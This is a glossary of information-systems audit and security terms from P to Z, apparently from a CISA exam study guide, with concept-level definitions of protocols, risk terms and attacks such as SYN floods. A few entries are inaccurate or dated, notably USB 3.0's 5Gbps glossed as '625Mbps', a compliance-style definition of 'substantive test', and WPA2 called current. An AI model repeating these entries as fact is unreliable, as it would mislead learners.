port A connection used by protocols and applications. Port numbers are divided into three ranges: well-known ports, registered ports, and dynamic and/or private ports. Well-known ports are those from 0 through 1023, registered ports are those ranging from 1024 through 49151, and dynamic and/or private ports are those from 49152 through 65535.

Post Office Protocol (POP) A commonly implemented protocol for retrieving email from a mail server to a client machine; POP3 is the current version. IMAP is the main alternative, and Microsoft Exchange uses its own client protocols.

principle of least privilege A principle that improves security by limiting access to just the functions consistent with the individual’s job function.

procedures A written set of steps to execute policies through specific, prescribed actions; this is the how in relation to a policy. Procedures tend to be more detailed than policies. They identify the method and state in a series of steps exactly how to accomplish an intended task, achieve a desired business or functional outcome, and execute a policy.

protocol A set of formalized rules that describe how data is transmitted over a network. Low-level protocols define the electrical and physical standard, whereas high-level protocols deal with the formatting, addressing, and delivery of data. TCP and IP are examples of higher-level protocols.

prototyping The process of quickly putting together a working model (a prototype) to test various aspects of a design, illustrate ideas or features, and gather early user feedback. Prototyping is often an integral part of the development process, where it is believed to reduce project risk and cost.

proxy server A type of firewall that is used to improve performance and for added security. A proxy server intercepts all requests to the real server to see whether it can fulfill the requests itself. If not, it forwards the request to the real server.

public key encryption An encryption scheme that uses a mathematically related key pair. In an email transaction, the recipient’s public key encrypts the data and the corresponding private key decrypts it. Because the private key is never transmitted or publicized, anyone who intercepts the message cannot read it. For digital signatures, the process is reversed: the sender uses the private key to create the digital signature, and anyone who has access to the corresponding public key can verify it.

Public Key Infrastructure (PKI) An infrastructure based on public-key cryptography that is used to facilitate e-commerce and build trust. PKI consists of hardware, software, people, policies, and procedures; it is used to create, manage, store, distribute, and revoke public key certificates.

Q

qualitative risk assessment A type of assessment that involves ranking the seriousness of risks and threats based primarily on an individual’s expertise and opinion.

quality assurance (QA) The processes and techniques involved in monitoring operations and testing outputs to ensure consistent quality by identifying errors and opportunities to improve products and services.

quantitative risk assessment A type of assessment that involves ranking the seriousness of risks and threats based primarily on data collection and data modelling.

R

rapid application development (RAD) An alternative to the conventional waterfall model that focuses on speed and uses techniques such as prototyping, iterative development, and time boxing.

recovery point objective (RPO) The maximum amount of data loss, expressed as the age of the most recent usable backup or replica, that an organization can tolerate after a disruption. The RPO determines how often data must be backed up or replicated; elapsed time to restore service is the RTO, not the RPO.

recovery testing Testing aimed at verifying a system’s capability to recover from various degrees of failure.

recovery time objective (RTO) During the execution of disaster recovery or business continuity plans, the time goal for the reestablishment and recovery of a business function or resource.

redundant array of inexpensive disks (RAID) A type of fault tolerance and performance improvement for disk drives that employs two or more drives in combination.

registration authority (RA) An entity in a PKI responsible for identifying and authenticating the applicant for a certificate before the certificate authority issues it. The RA is not responsible for signing or issuing certificates.

Remote Authentication Dial-In User Service (RADIUS) A client/server protocol and software that allows network access servers to pass authentication, authorization, and accounting requests to a central server. It serves as the authentication server in 802.1X deployments such as enterprise wireless.

repeater A network device used to regenerate or replicate a signal. Repeaters are used in transmission systems to regenerate analog or digital signals distorted by transmission loss.

resilience The ability for a computer system, control, or process to recover quickly after a disruption event such as a data transmission failure, power outage, etc.

return on investment (ROI) A common profitability ratio calculated by dividing the net benefit of an investment by its cost, usually expressed as a percentage.

reverse engineering The process of taking a software program apart and analyzing its workings in detail, usually to construct a new device or program that does the same thing without actually copying anything from the original.

right-to-audit clause A contract term that allows an organization to audit an outsourcing partner’s operation.

Rijndael A symmetric encryption algorithm chosen to be the Advanced Encryption Standard (AES).

risk acceptance A decision an organization makes when it knows about a risk but makes a conscious decision to accept the risk.

risk avoidance A situation in which an organization does not perform an activity that allows risk to be present.

risk reduction A situation in which an organization employs a method of mitigating the chance a risk will occur.

risk transference A situation in which an organization transfers risk to someone else.

rotation of assignment A process that involves ensuring that individuals are moved between roles over time.

rounding down A form of computer fraud that involves rounding down dollar amounts and stealing small amounts of money. For example, the value $1,199.50 might be rounded down to $1,199.00.

S

script kiddie The lowest form of cracker, who looks for easy targets and well-worn vulnerabilities.

segregation of duties (SoD) The splitting of functions between roles to ensure that at least two individuals are engaged to perform high-risk functions.

service level agreement (SLA) A contractual agreement between an organization and its service provider. An SLA defines the requirements the service provider must meet and protects the organization by holding the provider accountable for those requirements.

service set ID (SSID) A sequence of up to 32 letters or numbers that is the ID, or name, of a wireless local area network and is used to differentiate networks.

SHA A hashing algorithm that uses a 160-, 256-, or 512-bit hash function.

short-term business goals Goals that address immediate concerns that are no more than 18 months into the future.

Simple Mail Transfer Protocol (SMTP) An Internet standard for electronic mail (email) transmission defined by RFC 821.

Simple Network Management Protocol (SNMP) An application-layer protocol that facilitates the exchange of management information between network devices. SNMPv1 uses well-known community strings of public and private. More recent versions, SNMPv2c and SNMPv3, provide improved performance, flexibility, and security.

smurf attack A DDoS attack in which an attacker transmits large numbers of ICMP echo request (ping) packets to a targeted IP destination device, using the targeted destination’s IP address as the source address. This is called spoofing the IP source address. IP routers and other IP devices that respond to broadcasts reply to the targeted IP device with ICMP echo replies, thus multiplying the amount of bogus traffic.

social engineering The practice of tricking employees into revealing sensitive data about their computer system or infrastructure. This type of attack targets people using the art of human manipulation. Even when systems are physically well protected, social engineering attacks are possible.

source lines of code (SLOC) A software metric used to measure the size of a computer program by counting the number of lines in the text of the program’s source code.

SQL injection An attack in which malicious code is embedded in a poorly designed application and passed to the SQL database.

standards Mandatory actions, explicit rules, controls, or configuration settings that are designed to support and conform to a policy.

static data Data that does not change frequently, such as an individual’s Social Security number.

statistical sampling Sampling based on probability, in which every item of the population has a known chance of selection.

stochastic Based on random behavior because the occurrence of individual events cannot be predicted, yet measuring the distribution of all observations usually follows a predictable pattern.

storage area network (SAN) A high-speed subnetwork that interconnects different data storage devices with associated data servers for a large network. SANs support disk mirroring, backup and restore, archival and retrieval of archived data, data migration from one storage device to another, and the sharing of data among different servers in a network.

substantive test A test used to verify the integrity of a claim by making sure that the controls are working.

symmetric algorithm An algorithm with which both parties use the same cryptographic key.

symmetric encryption An encryption standard that requires all parties to have a copy of a shared key. A single key is used for both encryption and decryption.

SYN flood attack A DDoS attack in which the attacker sends a succession of SYN packets with a spoofed address to a targeted destination IP device but does not send the last ACK packet to acknowledge and confirm receipt. This leaves half-open connections between the client and the server until all resources are absorbed, rendering the server or targeted IP destination device unavailable because of resource allocation to the attack.

system control parameters Control values that affect how a system processes transactions.

systems development life cycle (SDLC) A method for developing information systems that has five main stages: analysis, design, development, implementation, and evaluation. Each stage has several components; for example, the development stage includes programming (coding, including internal documentation; debugging; testing; and documenting) and acquiring equipment (selection, acquisition [purchase or lease], and testing).

T

Taguchi model A statistical approach to optimizing the design of a process and improving the quality of each of its components by identifying the processes affected by outside influences (noise) that have the greatest effects on product variability and then eliminating them.

task statements Questions on the CISA exam that test a candidate on how an auditor applies hard skills, such as how to communicate audit examination results.

telecommunications Systems that transport information over a distance, sending and receiving audio, video, and data signals through electronic means.

Temporal Key Integrity Protocol (TKIP) An encryption protocol included as part of the IEEE 802.11i standard for wireless LANs that was created to add more security to WEP.

threat Any circumstance or event that has the potential to negatively impact an organization.

three lines of defense The idea of managing risk through three independent layers within the organization to minimize the failure to identify a major risk.

top-down testing Testing that is used to simulate the behavior of lower-level modules that are not yet integrated.

total cost of ownership (TCO) A dollar estimate used to help buyers and owners determine the direct and indirect costs of a developed system or application.

transaction A unique and logical step performed by software to perform a specific task, such as crediting a bank account after making a deposit.

transaction files Files involved in the transmission of information between two systems or applications.

Transmission Control Protocol (TCP) One of the main protocols of IP, which is used for reliability and guaranteed delivery of data.

Transmission Control Protocol/Internet Protocol (TCP/IP) A collection of protocols used to provide the basis for Internet and World Wide Web services.

turnstile A one-way gate or access control mechanism used to limit traffic and control the flow of people.

U

uninterruptible power supply (UPS) A device designed to provide a backup power supply during a power failure. Basically, a UPS is a battery backup system with an ultra-fast sensing device.

universal serial bus (USB) A specification standard for connecting peripherals to a computer. It can connect up to 127 devices to a computer, and USB 3.0 is capable of transferring data at up to 5Gbps (625Mbps).

User Datagram Protocol (UDP) A connectionless protocol that provides very few error recovery services but offers a quick and direct way to send and receive datagrams.

V

virtual LAN (VLAN) A group of devices on one or more LANs that are configured to communicate directly when in fact they may be located on a number of different LAN segments.

virtual private network (VPN) A private network that uses a public network to connect remote sites and users.

virus A computer program that has the capability to generate copies of itself and thereby spread. Viruses usually require the interaction of an individual and can have rather benign results, such as flashing a message to the screen, or rather malicious results, such as destroying data, systems, integrity, or availability.

virus scanning One of the most basic ways of scanning for computer viruses, which works by comparing suspect files and programs to signatures of known viruses stored in a database.

Voice over IP (VoIP) A combination of software and hardware that enables people to use the Internet as the transmission medium for telephone calls by sending voice data in packets via Internet Protocol.

vulnerability A flaw or weakness in a security system, software, or procedure.

W

waiver program An ISACA program for individuals who are new to the technology field that allows them to substitute up to three years of work experience credit, verified through the employer, when applying for CISA certification.

war driving The process of driving around a neighborhood or an area to identify wireless access points.

warm site An alternative computer facility that is partially configured and can be made ready in a few days.

white box testing A security assessment or penetration test in which all aspects of the network are known.

wide area network (WAN) A network that spans the distance between buildings, cities, and even countries. WANs are LANs connected using wide area network services from telecommunications carriers; they typically use technologies such as standard phone lines—called plain old telephone service (POTS) or public switched telephone network (PSTN)—Integrated Services Digital Network (ISDN), Frame Relay, Asynchronous Transfer Mode (ATM), and other high-speed services.

Wi-Fi Protected Access (WPA) A security standard for wireless networks designed to be more secure than WEP. Developed from the draft 802.11i standard.

Wired Equivalent Privacy (WEP) Encryption based on the RC4 encryption scheme. It was designed to provide the same level of security as a wired LAN. Because of 40-bit encryption and problems with the initialization vector, it was found to be insecure.

work breakdown structure (WBS) A process that shows what activities need to be completed in a hierarchical manner.

WPA2 The current standard in wireless security. WPA2 uses AES and optional Pre-Shared Key (PSK) authentication.

Z

zero-day exploit An exploit for a vulnerability that has no available vendor patch.